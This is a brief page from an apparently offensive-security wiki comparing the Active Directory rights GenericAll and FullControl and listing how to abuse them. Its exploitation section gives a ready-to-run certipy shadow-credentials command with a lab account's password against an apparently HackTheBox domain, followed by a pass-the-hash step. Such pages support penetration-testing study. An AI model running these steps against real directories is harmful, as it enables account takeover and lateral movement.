FullControl

Information

GenericAll vs. FullControl

GenericAll is a specific Active Directory right that grants full control over an object. This includes the ability to read, write, modify, and delete the object and its properties. This is the right typically needed to fully control an AD object.
FullControl is a broader Windows permission concept. When we see it in tools or GUIs (like File Explorer or ACL editors), it usually maps to GenericAll for AD objects, but can include some additional flags related to inheritance and specific extended rights.

Full Control typically refers to the highest level of permissions granted on an object in AD. It allows the user or group to perform all actions on the object, including creating, deleting, modifying, and changing permissions.

Exploitation

Password Change

Check how here.

Shadow Credential

Get the object's hash and perform a PtH attack.

certipy shadow auto -username oorend@rebound.htb -password '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb

PreviousForceChangePassword NextGenericAll

Last updated 1 month ago

Was this helpful?